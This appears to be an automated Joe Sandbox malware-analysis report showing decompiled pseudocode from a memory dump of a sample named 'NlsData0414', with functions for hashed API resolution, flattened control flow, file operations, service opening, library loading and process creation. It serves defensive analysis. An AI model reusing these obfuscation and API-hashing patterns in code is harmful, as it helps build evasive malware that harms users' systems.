                                                        control_flow_graph 186 2b3780-2b3793 187 2b37b0-2b37c5 186->187 188 2b3795-2b37ab call 2b3f00 call 2b3e60 186->188 192 2b37e2-2b37fa 187->192 193 2b37c7-2b37dd call 2b3f00 call 2b3e60 187->193 188->187 200 2b37fc-2b3812 call 2b3f00 call 2b3e60 192->200 201 2b3817-2b3832 192->201 193->192 200->201 206 2b384f-2b385e 201->206 207 2b3834-2b384a call 2b3f00 call 2b3e60 201->207 214 2b387b-2b38b4 206->214 215 2b3860-2b3876 call 2b3f00 call 2b3e60 206->215 207->206 220 2b38d1-2b38e2 SHFileOperationW 214->220 221 2b38b6-2b38cc call 2b3f00 call 2b3e60 214->221 215->214 221->220
                                                        C-Code - Quality: 62%
                                                        			E002B3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                        				char _v520;
                                                        				char _v528;
                                                        				char _v536;
                                                        				char _v1040;
                                                        				char _v1056;
                                                        				short _v1072;
                                                        				char* _v1076;
                                                        				char* _v1080;
                                                        				intOrPtr _v1084;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t14;
                                                        				intOrPtr* _t16;
                                                        				intOrPtr* _t18;
                                                        				intOrPtr* _t20;
                                                        				signed int _t26;
                                                        				void* _t36;
                                                        				void* _t63;
                                                        				void* _t66;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				void* _t71;
                                                        				void* _t72;
                                                        				struct _SHFILEOPSTRUCTW* _t73;
                                                        
                                                        				_t70 =  &_v1072;
                                                        				_t12 =  *0x2bddc0;
                                                        				_t66 = __ecx;
                                                        				_t63 = __edx;
                                                        				if(_t12 == 0) {
                                                        					_t12 = E002B3E60(_t36, E002B3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x2bddc0 = _t12;
                                                        				}
                                                        				 *_t12( &_v1072, 0, 0x1e);
                                                        				_t14 =  *0x2bddc0;
                                                        				_t71 = _t70 + 0xc;
                                                        				if(_t14 == 0) {
                                                        					_t14 = E002B3E60(_t36, E002B3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x2bddc0 = _t14;
                                                        				}
                                                        				 *_t14( &_v1040, 0, 0x208);
                                                        				_t16 =  *0x2bddc0;
                                                        				_t72 = _t71 + 0xc;
                                                        				if(_t16 == 0) {
                                                        					_t16 = E002B3E60(_t36, E002B3F00(0xc6fbcd74), 0x7e0ae558, _t69);
                                                        					 *0x2bddc0 = _t16;
                                                        				}
                                                        				 *_t16( &_v520, 0, 0x208);
                                                        				_t18 =  *0x2be298;
                                                        				_t73 = _t72 + 0xc;
                                                        				if(_t18 == 0) {
                                                        					_t18 = E002B3E60(_t36, E002B3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x2be298 = _t18;
                                                        				}
                                                        				 *_t18( &_v1040, _t66);
                                                        				_t20 =  *0x2be298;
                                                        				if(_t20 == 0) {
                                                        					_t20 = E002B3E60(_t36, E002B3F00(0x9bab0b12), 0xba782e65, _t69);
                                                        					 *0x2be298 = _t20;
                                                        				}
                                                        				 *_t20( &_v528, _t63);
                                                        				_v1084 = 1;
                                                        				_v1080 =  &_v1056;
                                                        				_v1076 =  &_v536;
                                                        				_v1072 = 0xe14;
                                                        				if( *0x2be30c == 0) {
                                                        					 *0x2be30c = E002B3E60(_t36, E002B3F00(0xd9518805), 0x262a6194, _t69);
                                                        				}
                                                        				_t26 = SHFileOperationW(_t73); // executed
                                                        				asm("sbb eax, eax");
                                                        				return  ~_t26 + 1;
                                                        			}


























                                                        0x002b3785
                                                        0x002b3780
                                                        0x002b378c
                                                        0x002b378f
                                                        0x002b3793
                                                        0x002b37a6
                                                        0x002b37ab
                                                        0x002b37ab
                                                        0x002b37b9
                                                        0x002b37bb
                                                        0x002b37c0
                                                        0x002b37c5
                                                        0x002b37d8
                                                        0x002b37dd
                                                        0x002b37dd
                                                        0x002b37ee
                                                        0x002b37f0
                                                        0x002b37f5
                                                        0x002b37fa
                                                        0x002b380d
                                                        0x002b3812
                                                        0x002b3812
                                                        0x002b3826
                                                        0x002b3828
                                                        0x002b382d
                                                        0x002b3832
                                                        0x002b3845
                                                        0x002b384a
                                                        0x002b384a
                                                        0x002b3855
                                                        0x002b3857
                                                        0x002b385e
                                                        0x002b3871
                                                        0x002b3876
                                                        0x002b3876
                                                        0x002b3884
                                                        0x002b388a
                                                        0x002b3892
                                                        0x002b389d
                                                        0x002b38a6
                                                        0x002b38b4
                                                        0x002b38cc
                                                        0x002b38cc
                                                        0x002b38d5
                                                        0x002b38d9
                                                        0x002b38e2

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileOperation
                                                        • String ID: X~$X~$X~
                                                        • API String ID: 3080627654-3258893172
                                                        • Opcode ID: d26c65213ae33bc4bd4c2a20ee0151606622601fb103d3ca11a3d4c85d08079e
                                                        • Instruction ID: 390f4406f285ac082aeb45f3ae31498b89a6d47da05a986b681fd887215f7847
                                                        • Opcode Fuzzy Hash: d26c65213ae33bc4bd4c2a20ee0151606622601fb103d3ca11a3d4c85d08079e
                                                        • Instruction Fuzzy Hash: 8431BE71A202024BDB14EF79EC157FB37EAAB94744F000A2DB955CB292FA34DA118B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 228 2b8e80-2b8e98 229 2b8ea0-2b8ea5 228->229 230 2b8eab 229->230 231 2b8f7a-2b8f7f 229->231 232 2b8f3f-2b8f46 230->232 233 2b8eb1-2b8eb6 230->233 234 2b9011-2b9016 231->234 235 2b8f85-2b8f8a 231->235 240 2b8f48-2b8f5e call 2b3f00 call 2b3e60 232->240 241 2b8f63-2b8f75 232->241 236 2b901b-2b9022 233->236 237 2b8ebc-2b8ec1 233->237 234->229 238 2b8fce-2b8fd5 235->238 239 2b8f8c-2b8f91 235->239 242 2b903f 236->242 243 2b9024-2b903a call 2b3f00 call 2b3e60 236->243 244 2b8efc-2b8f03 237->244 245 2b8ec3-2b8ec8 237->245 248 2b8ff2-2b900c OpenServiceW 238->248 249 2b8fd7-2b8fed call 2b3f00 call 2b3e60 238->249 246 2b8fbb-2b8fc0 239->246 247 2b8f93-2b8fa3 239->247 240->241 241->229 264 2b9042-2b9049 242->264 243->242 258 2b8f20-2b8f2f 244->258 259 2b8f05-2b8f1b call 2b3f00 call 2b3e60 244->259 245->246 252 2b8ece-2b8ed5 245->252 246->229 255 2b8fc6-2b8fcd 246->255 253 2b8fae-2b8fb6 247->253 254 2b8fa5-2b8fac 247->254 248->229 249->248 262 2b8ef2-2b8efa 252->262 263 2b8ed7-2b8eed call 2b3f00 call 2b3e60 252->263 253->229 254->253 254->254 258->264 276 2b8f35-2b8f3a 258->276 259->258 262->229 263->262 276->229
                                                        C-Code - Quality: 66%
                                                        			E002B8E80() {
                                                        				short* _v4;
                                                        				void* __ebx;
                                                        				void* __ecx;
                                                        				void* __ebp;
                                                        				void* _t4;
                                                        				void* _t6;
                                                        				intOrPtr* _t11;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t19;
                                                        				intOrPtr* _t22;
                                                        				void* _t25;
                                                        				void* _t42;
                                                        				short* _t43;
                                                        				intOrPtr _t44;
                                                        				short* _t45;
                                                        				void* _t46;
                                                        				void* _t47;
                                                        
                                                        				_t25 = _v4;
                                                        				_t4 = 0x1779a150;
                                                        				_t46 = _v4;
                                                        				_t43 = _v4;
                                                        				_t42 = 0;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t47 = _t4 - 0xebfcc22;
                                                        						if(_t47 <= 0) {
                                                        							break;
                                                        						}
                                                        						if(_t4 == 0x1779a150) {
                                                        							_t4 = 0x23287775;
                                                        							continue;
                                                        						} else {
                                                        							if(_t4 == 0x1e3d7119) {
                                                        								if( *0x2be270 == 0) {
                                                        									 *0x2be270 = E002B3E60(_t25, E002B3F00(0x26f5757c), 0x56e230f9, _t46);
                                                        								}
                                                        								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
                                                        								_t25 = _t6;
                                                        								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
                                                        								continue;
                                                        							} else {
                                                        								if(_t4 != 0x23287775) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t44 =  *0x2be54c; // 0x5be1f8
                                                        									_t45 = _t44 + 0x260;
                                                        									while( *_t45 != 0x5c) {
                                                        										_t45 = _t45 + 2;
                                                        									}
                                                        									_t43 = _t45 + 2;
                                                        									_t4 = 0x10ada17;
                                                        									continue;
                                                        								}
                                                        							}
                                                        						}
                                                        						L32:
                                                        					}
                                                        					if(_t47 == 0) {
                                                        						_t11 =  *0x2be4c8;
                                                        						if(_t11 == 0) {
                                                        							_t11 = E002B3E60(_t25, E002B3F00(0x26f5757c), 0xe9d3e51f, _t46);
                                                        							 *0x2be4c8 = _t11;
                                                        						}
                                                        						 *_t11(_t25);
                                                        						_t42 =  !=  ? 1 : _t42;
                                                        						_t4 = 0xd10de09;
                                                        						goto L1;
                                                        					} else {
                                                        						if(_t4 == 0xbf6010) {
                                                        							_t15 =  *0x2be18c;
                                                        							if(_t15 == 0) {
                                                        								_t15 = E002B3E60(_t25, E002B3F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        								 *0x2be18c = _t15;
                                                        							}
                                                        							 *_t15(_t46);
                                                        							goto L31;
                                                        						} else {
                                                        							if(_t4 == 0x10ada17) {
                                                        								_t19 =  *0x2be310;
                                                        								if(_t19 == 0) {
                                                        									_t19 = E002B3E60(_t25, E002B3F00(0x26f5757c), 0x9ba7cd1, _t46);
                                                        									 *0x2be310 = _t19;
                                                        								}
                                                        								_t46 =  *_t19(0, 0, 0xf003f);
                                                        								if(_t46 == 0) {
                                                        									L31:
                                                        									return _t42;
                                                        								} else {
                                                        									_t4 = 0x1e3d7119;
                                                        									goto L1;
                                                        								}
                                                        							} else {
                                                        								if(_t4 != 0xd10de09) {
                                                        									goto L22;
                                                        								} else {
                                                        									_t22 =  *0x2be18c;
                                                        									if(_t22 == 0) {
                                                        										_t22 = E002B3E60(_t25, E002B3F00(0x26f5757c), 0x268fe5f0, _t46);
                                                        										 *0x2be18c = _t22;
                                                        									}
                                                        									 *_t22(_t25);
                                                        									_t4 = 0xbf6010;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L32;
                                                        					L22:
                                                        				} while (_t4 != 0x2dd4caa9);
                                                        				return _t42;
                                                        				goto L32;
                                                        			}




















                                                        0x002b8e82
                                                        0x002b8e86
                                                        0x002b8e8c
                                                        0x002b8e91
                                                        0x002b8e96
                                                        0x002b8e98
                                                        0x002b8ea0
                                                        0x002b8ea0
                                                        0x002b8ea0
                                                        0x002b8ea0
                                                        0x002b8ea5
                                                        0x00000000
                                                        0x00000000
                                                        0x002b8f7f
                                                        0x002b9011
                                                        0x00000000
                                                        0x002b8f85
                                                        0x002b8f8a
                                                        0x002b8fd5
                                                        0x002b8fed
                                                        0x002b8fed
                                                        0x002b8ff9
                                                        0x002b8ffb
                                                        0x002b9009
                                                        0x00000000
                                                        0x002b8f8c
                                                        0x002b8f91
                                                        0x00000000
                                                        0x002b8f93
                                                        0x002b8f93
                                                        0x002b8f99
                                                        0x002b8fa3
                                                        0x002b8fa5
                                                        0x002b8fa8
                                                        0x002b8fae
                                                        0x002b8fb1
                                                        0x00000000
                                                        0x002b8fb1
                                                        0x002b8f91
                                                        0x002b8f8a
                                                        0x00000000
                                                        0x002b8f7f
                                                        0x002b8eab
                                                        0x002b8f3f
                                                        0x002b8f46
                                                        0x002b8f59
                                                        0x002b8f5e
                                                        0x002b8f5e
                                                        0x002b8f64
                                                        0x002b8f6d
                                                        0x002b8f70
                                                        0x00000000
                                                        0x002b8eb1
                                                        0x002b8eb6
                                                        0x002b901b
                                                        0x002b9022
                                                        0x002b9035
                                                        0x002b903a
                                                        0x002b903a
                                                        0x002b9040
                                                        0x00000000
                                                        0x002b8ebc
                                                        0x002b8ec1
                                                        0x002b8efc
                                                        0x002b8f03
                                                        0x002b8f16
                                                        0x002b8f1b
                                                        0x002b8f1b
                                                        0x002b8f2b
                                                        0x002b8f2f
                                                        0x002b9042
                                                        0x002b9049
                                                        0x002b8f35
                                                        0x002b8f35
                                                        0x00000000
                                                        0x002b8f35
                                                        0x002b8ec3
                                                        0x002b8ec8
                                                        0x00000000
                                                        0x002b8ece
                                                        0x002b8ece
                                                        0x002b8ed5
                                                        0x002b8ee8
                                                        0x002b8eed
                                                        0x002b8eed
                                                        0x002b8ef3
                                                        0x002b8ef5
                                                        0x00000000
                                                        0x002b8ef5
                                                        0x002b8ec8
                                                        0x002b8ec1
                                                        0x002b8eb6
                                                        0x00000000
                                                        0x002b8fbb
                                                        0x002b8fbb
                                                        0x002b8fcd
                                                        0x00000000

                                                        APIs
                                                        • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,005BE1F8,002B8782,?,3251FEFE,?), ref: 002B8FF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenService
                                                        • String ID: uw(#$uw(#
                                                        • API String ID: 3098006287-1105621689
                                                        • Opcode ID: a79fce450df5259719944f1ce114849dee8ec80c12012486dfa489b1898e9896
                                                        • Instruction ID: 8ff505074defa0441bccb6eb9b0715e05311e47fa5b5719564ccf26b1884f7cc
                                                        • Opcode Fuzzy Hash: a79fce450df5259719944f1ce114849dee8ec80c12012486dfa489b1898e9896
                                                        • Instruction Fuzzy Hash: 3141FA31B342059BDF20AFBC6C857FA22DAAB947D0F610925F95AC7B41EE70DC508B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 283 2b7120 284 2b7125-2b712a 283->284 285 2b7130 284->285 286 2b71b4-2b71b9 284->286 287 2b7233-2b7248 call 2b34c0 285->287 288 2b7136-2b713b 285->288 289 2b71bb 286->289 290 2b7207-2b720c 286->290 311 2b724a-2b7260 call 2b3f00 call 2b3e60 287->311 312 2b7265-2b7278 LoadLibraryW 287->312 291 2b713d 288->291 292 2b7190-2b7195 288->292 294 2b71ee-2b7202 call 2b7080 289->294 295 2b71bd-2b71c2 289->295 296 2b720e-2b7222 call 2b7080 290->296 297 2b7227-2b722c 290->297 301 2b717a-2b718e call 2b7080 291->301 302 2b713f-2b7144 291->302 292->297 298 2b719b-2b71af call 2b7080 292->298 294->284 304 2b71d5-2b71e9 call 2b7080 295->304 305 2b71c4-2b71c9 295->305 296->284 297->284 300 2b7232 297->300 298->284 301->284 309 2b7146-2b714b 302->309 310 2b7164-2b7178 call 2b7080 302->310 304->284 305->297 313 2b71cb-2b71d0 305->313 309->297 318 2b7151-2b7162 call 2b7080 309->318 310->284 311->312 322 2b727a-2b7290 call 2b3f00 call 2b3e60 312->322 323 2b7295-2b72a0 312->323 313->284 318->284 322->323 334 2b72bd-2b72c5 323->334 335 2b72a2-2b72b8 call 2b3f00 call 2b3e60 323->335 335->334
                                                        C-Code - Quality: 85%
                                                        			E002B7120(void* __ebx) {
                                                        				void* _t2;
                                                        				struct HINSTANCE__* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t21;
                                                        				intOrPtr _t23;
                                                        				void* _t48;
                                                        				WCHAR* _t51;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        
                                                        				_t21 = __ebx;
                                                        				_t2 = 0x291da748;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t54 = _t2 - 0x1a8031ec;
                                                        						if(_t54 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t54 == 0) {
                                                        							_t51 = E002B34C0(0x2bd830);
                                                        							__eflags =  *0x2bdd1c;
                                                        							if( *0x2bdd1c == 0) {
                                                        								 *0x2bdd1c = E002B3E60(_t21, E002B3F00(0x9bab0b12), 0xe4b28d97, _t53);
                                                        							}
                                                        							_t8 = LoadLibraryW(_t51);
                                                        							_t23 =  *0x2be548; // 0x5f7ed8
                                                        							 *(_t23 + 0x4c) = _t8;
                                                        							_t9 =  *0x2be494;
                                                        							__eflags = _t9;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E002B3E60(_t21, E002B3F00(0x9bab0b12), 0x7facde30, _t53);
                                                        								 *0x2be494 = _t9;
                                                        							}
                                                        							_t48 =  *_t9();
                                                        							_t11 =  *0x2bdf30;
                                                        							__eflags = _t11;
                                                        							if(_t11 == 0) {
                                                        								_t11 = E002B3E60(_t21, E002B3F00(0x9bab0b12), 0x5010a54d, _t53);
                                                        								 *0x2bdf30 = _t11;
                                                        							}
                                                        							return  *_t11(_t48, 0, _t51);
                                                        						} else {
                                                        							_t55 = _t2 - 0x185e9846;
                                                        							if(_t55 > 0) {
                                                        								__eflags = _t2 - 0x18843476;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									E002B7080(_t21, 0x2bd7a0, 4, __eflags);
                                                        									_t2 = 0x2eb73d4f;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t55 == 0) {
                                                        									E002B7080(_t21, 0x2bd8f0, 2, __eflags);
                                                        									_t2 = 0x9da2520;
                                                        									continue;
                                                        								} else {
                                                        									if(_t2 == 0x9da2520) {
                                                        										E002B7080(_t21, 0x2bd800, 3, __eflags);
                                                        										_t2 = 0x18843476;
                                                        										continue;
                                                        									} else {
                                                        										_t57 = _t2 - 0x15a7f569;
                                                        										if(_t2 != 0x15a7f569) {
                                                        											goto L21;
                                                        										} else {
                                                        											E002B7080(_t21, 0x2bd860, 0, _t57);
                                                        											_t2 = 0x39797244;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t2 - 0x2eb73d4f;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t2 - 0x39797244;
                                                        						if(__eflags != 0) {
                                                        							goto L21;
                                                        						} else {
                                                        							E002B7080(_t21, 0x2bd890, 1, __eflags);
                                                        							_t2 = 0x185e9846;
                                                        							goto L1;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							E002B7080(_t21, 0x2bd7e0, 5, __eflags);
                                                        							_t2 = 0x22a44863;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t2 - 0x22a44863;
                                                        							if(__eflags == 0) {
                                                        								E002B7080(_t21, 0x2bd8c0, 6, __eflags);
                                                        								_t2 = 0x1a8031ec;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t2 - 0x291da748;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									_t2 = 0x15a7f569;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L21:
                                                        					__eflags = _t2 - 0x21acdd7e;
                                                        				} while (__eflags != 0);
                                                        				return _t2;
                                                        				goto L30;
                                                        			}














                                                        0x002b7120
                                                        0x002b7120
                                                        0x002b7120
                                                        0x002b7125
                                                        0x002b7125
                                                        0x002b7125
                                                        0x002b7125
                                                        0x002b712a
                                                        0x00000000
                                                        0x00000000
                                                        0x002b7130
                                                        0x002b723f
                                                        0x002b7246
                                                        0x002b7248
                                                        0x002b7260
                                                        0x002b7260
                                                        0x002b7266
                                                        0x002b7268
                                                        0x002b726e
                                                        0x002b7271
                                                        0x002b7276
                                                        0x002b7278
                                                        0x002b728b
                                                        0x002b7290
                                                        0x002b7290
                                                        0x002b7297
                                                        0x002b7299
                                                        0x002b729e
                                                        0x002b72a0
                                                        0x002b72b3
                                                        0x002b72b8
                                                        0x002b72b8
                                                        0x002b72c5
                                                        0x002b7136
                                                        0x002b7136
                                                        0x002b713b
                                                        0x002b7190
                                                        0x002b7195
                                                        0x00000000
                                                        0x002b719b
                                                        0x002b71a5
                                                        0x002b71aa
                                                        0x00000000
                                                        0x002b71aa
                                                        0x002b713d
                                                        0x002b713d
                                                        0x002b7184
                                                        0x002b7189
                                                        0x00000000
                                                        0x002b713f
                                                        0x002b7144
                                                        0x002b716e
                                                        0x002b7173
                                                        0x00000000
                                                        0x002b7146
                                                        0x002b7146
                                                        0x002b714b
                                                        0x00000000
                                                        0x002b7151
                                                        0x002b7158
                                                        0x002b715d
                                                        0x00000000
                                                        0x002b715d
                                                        0x002b714b
                                                        0x002b7144
                                                        0x002b713d
                                                        0x002b713b
                                                        0x00000000
                                                        0x002b7130
                                                        0x002b71b4
                                                        0x002b71b9
                                                        0x002b7207
                                                        0x002b720c
                                                        0x00000000
                                                        0x002b720e
                                                        0x002b7218
                                                        0x002b721d
                                                        0x00000000
                                                        0x002b721d
                                                        0x002b71bb
                                                        0x002b71bb
                                                        0x002b71f8
                                                        0x002b71fd
                                                        0x00000000
                                                        0x002b71bd
                                                        0x002b71bd
                                                        0x002b71c2
                                                        0x002b71df
                                                        0x002b71e4
                                                        0x00000000
                                                        0x002b71c4
                                                        0x002b71c4
                                                        0x002b71c9
                                                        0x00000000
                                                        0x002b71cb
                                                        0x002b71cb
                                                        0x00000000
                                                        0x002b71cb
                                                        0x002b71c9
                                                        0x002b71c2
                                                        0x002b71bb
                                                        0x00000000
                                                        0x002b7227
                                                        0x002b7227
                                                        0x002b7227
                                                        0x002b7232
                                                        0x00000000

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,002B68AC), ref: 002B7266
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: Dry9$Dry9
                                                        • API String ID: 1029625771-121480178
                                                        • Opcode ID: dc359577804550e0675c0a6cc7e8277e4a5f4e1bc9aaf034ad42abb0cf27535f
                                                        • Instruction ID: 9f51e105efe6d184db031b211d7d75ea5c2a6e3f79c2943475a7dae6cb818efa
                                                        • Opcode Fuzzy Hash: dc359577804550e0675c0a6cc7e8277e4a5f4e1bc9aaf034ad42abb0cf27535f
                                                        • Instruction Fuzzy Hash: 7731C420B3D10147DA24AEBE58A53FE11AA9BF03C4B604436F595CB795ED26CD324BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 343 2b4b70-2b4b80 344 2b4b9d-2b4bba 343->344 345 2b4b82-2b4b98 call 2b3f00 call 2b3e60 343->345 350 2b4bbc-2b4bd2 call 2b3f00 call 2b3e60 344->350 351 2b4bd7-2b4bf5 CreateProcessW 344->351 345->344 350->351 354 2b4c73-2b4c7a 351->354 355 2b4bf7-2b4bfd 351->355 357 2b4bff-2b4c13 355->357 358 2b4c14-2b4c1b 355->358 360 2b4c38-2b4c45 358->360 361 2b4c1d-2b4c33 call 2b3f00 call 2b3e60 358->361 367 2b4c62-2b4c72 360->367 368 2b4c47-2b4c5d call 2b3f00 call 2b3e60 360->368 361->360 368->367
                                                        C-Code - Quality: 60%
                                                        			E002B4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
                                                        				struct _STARTUPINFOW _v72;
                                                        				struct _PROCESS_INFORMATION _v88;
                                                        				intOrPtr* _t9;
                                                        				int _t12;
                                                        				intOrPtr* _t15;
                                                        				intOrPtr* _t17;
                                                        				WCHAR* _t44;
                                                        				WCHAR* _t45;
                                                        
                                                        				_t46 = __ebp;
                                                        				_t26 = __ebx;
                                                        				_t9 =  *0x2bddc0;
                                                        				_t45 = __edx;
                                                        				_t44 = __ecx;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E002B3E60(__ebx, E002B3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
                                                        					 *0x2bddc0 = _t9;
                                                        				}
                                                        				 *_t9( &_v72, 0, 0x44);
                                                        				_v72.cb = 0x44;
                                                        				if( *0x2be21c == 0) {
                                                        					 *0x2be21c = E002B3E60(_t26, E002B3F00(0x9bab0b12), 0xbd6cc871, _t46);
                                                        				}
                                                        				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
                                                        				if(_t12 == 0) {
                                                        					return 0;
                                                        				} else {
                                                        					if(_a12 == 0) {
                                                        						_t15 =  *0x2bde3c;
                                                        						if(_t15 == 0) {
                                                        							_t15 = E002B3E60(_t26, E002B3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x2bde3c = _t15;
                                                        						}
                                                        						 *_t15(_v88.hProcess);
                                                        						_t17 =  *0x2bde3c;
                                                        						if(_t17 == 0) {
                                                        							_t17 = E002B3E60(_t26, E002B3F00(0x9bab0b12), 0x20de7595, _t46);
                                                        							 *0x2bde3c = _t17;
                                                        						}
                                                        						 *_t17(_v88.hProcess);
                                                        						return 1;
                                                        					} else {
                                                        						asm("movdqu xmm0, [esp+0x8]");
                                                        						asm("movdqu [eax], xmm0");
                                                        						return 1;
                                                        					}
                                                        				}
                                                        			}











                                                        0x002b4b70
                                                        0x002b4b70
                                                        0x002b4b70
                                                        0x002b4b79
                                                        0x002b4b7c
                                                        0x002b4b80
                                                        0x002b4b93
                                                        0x002b4b98
                                                        0x002b4b98
                                                        0x002b4ba6
                                                        0x002b4bb0
                                                        0x002b4bba
                                                        0x002b4bd2
                                                        0x002b4bd2
                                                        0x002b4bf1
                                                        0x002b4bf5
                                                        0x002b4c7a
                                                        0x002b4bf7
                                                        0x002b4bfd
                                                        0x002b4c14
                                                        0x002b4c1b
                                                        0x002b4c2e
                                                        0x002b4c33
                                                        0x002b4c33
                                                        0x002b4c3c
                                                        0x002b4c3e
                                                        0x002b4c45
                                                        0x002b4c58
                                                        0x002b4c5d
                                                        0x002b4c5d
                                                        0x002b4c66
                                                        0x002b4c72
                                                        0x002b4bff
                                                        0x002b4bff
                                                        0x002b4c05
                                                        0x002b4c13
                                                        0x002b4c13
                                                        0x002b4bfd

                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 002B4BF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2275531038.00000000002B1000.00000020.00000001.sdmp, Offset: 002B0000, based on PE: true
                                                        • Associated: 0000000B.00000002.2275502828.00000000002B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275638046.00000000002BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.2275727314.00000000002BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_2b0000_NlsData0414.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID: D$X~
                                                        • API String ID: 963392458-2090554203
                                                        • Opcode ID: c50b1a2b93cead8f4d431e62b9edd3d7ff6e9db05a4af898b702fd658b9a6f35
                                                        • Instruction ID: 802691ff0c9f084e0e2c9702adccd3e49d37df9724f2800f2ca4868b70aff2d7
                                                        • Opcode Fuzzy Hash: c50b1a2b93cead8f4d431e62b9edd3d7ff6e9db05a4af898b702fd658b9a6f35
                                                        • Instruction Fuzzy Hash: B221F1307103021BEB14EF7ADC51BFB3BA6ABD0B84F00852DB654CB2A1FA70D9208B41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
